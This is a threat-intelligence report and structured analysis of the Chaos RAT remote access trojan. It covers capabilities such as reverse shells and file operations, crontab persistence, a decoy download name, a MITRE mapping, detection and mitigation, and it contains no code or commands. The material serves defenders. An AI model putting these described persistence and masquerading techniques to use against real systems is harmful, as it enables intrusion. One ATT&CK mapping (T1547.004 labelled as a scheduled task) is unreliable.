Full Report
Threat hunters are calling attention to a new variant of a remote access trojan (RAT) called Chaos RAT that has been used in recent attacks targeting Windows and Linux systems. According to findings from Acronis, the malware artifact may have been distributed by tricking victims into downloading a network troubleshooting utility for Linux environments. "Chaos RAT is an open-source RAT written in
Analysis Summary
# Tool/Technique: Chaos RAT
## Overview
Chaos RAT is an open-source, cross-platform Remote Access Trojan (RAT) written in Golang, used by threat actors for initial access, reconnaissance, and execution on compromised systems. It functions similarly to popular frameworks like Cobalt Strike and Sliver, offering an administrative panel for payload building and session control. Recent variants have been observed targeting Windows and Linux systems, sometimes in conjunction with cryptocurrency mining campaigns.
## Technical Details
- Type: Malware family (RAT)
- Platform: Windows, Linux
- Capabilities: Payload generation, session establishment, remote command execution (reverse shells), file operations (upload/download/delete), system enumeration, screenshot capture, system control (lock/restart/shutdown), arbitrary URL opening.
- First Seen: Development started in 2017; attracted attention in December 2022. Latest version (5.0.3) released May 31, 2024.
## MITRE ATT&CK Mapping
- TA0011 - Command and Control
- T1071 - Application Layer Protocol
- T1071.001 - Web Protocols
- TA0002 - Execution
- T1059 - Command and Scripting Interpreter
- T1059.004 - Unix Shell
- TA0003 - Persistence
- T1547 - Boot or Logon Autostart Execution
- T1547.004 - Scheduled Task/Job (Observed modifying `/etc/crontab`)
- TA0001 - Initial Access
- T1566 - Phishing
- T1566.001 - Spearphishing Attachment
- T1566.002 - Spearphishing Link
## Functionality
### Core Capabilities
- Establishment of command and control sessions over external servers.
- Launching reverse shells.
- File system manipulation (upload, download, delete).
- System information gathering and device enumeration.
- Remote system control (shutdown, restart, lock).
### Advanced Features
- Cross-platform compatibility (Windows and Linux) due to Golang implementation.
- Administrative panel for payload construction and management of compromised machines.
- Masquerading as legitimate utilities (e.g., "NetworkAnalyzer.tar.gz" for Linux troubleshooting).
- Potential for secondary payloads, such as XMRig cryptocurrency miners.
## Indicators of Compromise
- File Hashes: (Not provided explicitly in the text)
- File Names: "NetworkAnalyzer.tar.gz"
- Registry Keys: (Not provided)
- Network Indicators: Connects to an **external server** for commands (C2 address not specified/defanged).
- Behavioral Indicators: Modifies the task scheduler file **/etc/crontab** to fetch the malware periodically for persistence.
## Associated Threat Actors
- Currently unclear who is behind the use of Chaos RAT in real-world attacks, allowing APT groups to blend into cybercrime noise.
## Detection Methods
- Signature-based detection (If specific threat intelligence signatures exist for known artifacts).
- Behavioral detection: Monitoring for system modifications like changes to `/etc/crontab`.
- YARA rules if available.
## Mitigation Strategies
- Scrutinize emails containing malicious links or attachments, especially those tricking users into downloading utilities.
- Implement strict controls over scheduling services or file modification permissions for system configuration files like `/etc/crontab`.
- Be wary of open-source tools being weaponized; maintain strong endpoint detection and response (EDR) capabilities.
- Patching/Updating: Note that CVE-2024-30850 (Command Injection) and CVE-2024-31839 (XSS) affecting the admin panel were addressed by the maintainer as of May 2024; ensuring the administrative framework is updated is crucial if used.
## Related Tools/Techniques
- Cobalt Strike (Inspiration for administrative panel/framework design)
- Sliver (Inspiration for administrative panel/framework design)
- Cryptocurrency Miners (XMRig, often deployed post-infection)
- Clipper Malware (Mentioned in relation to related Trust Wallet campaigns, suggesting potential co-deployment or parallel activity).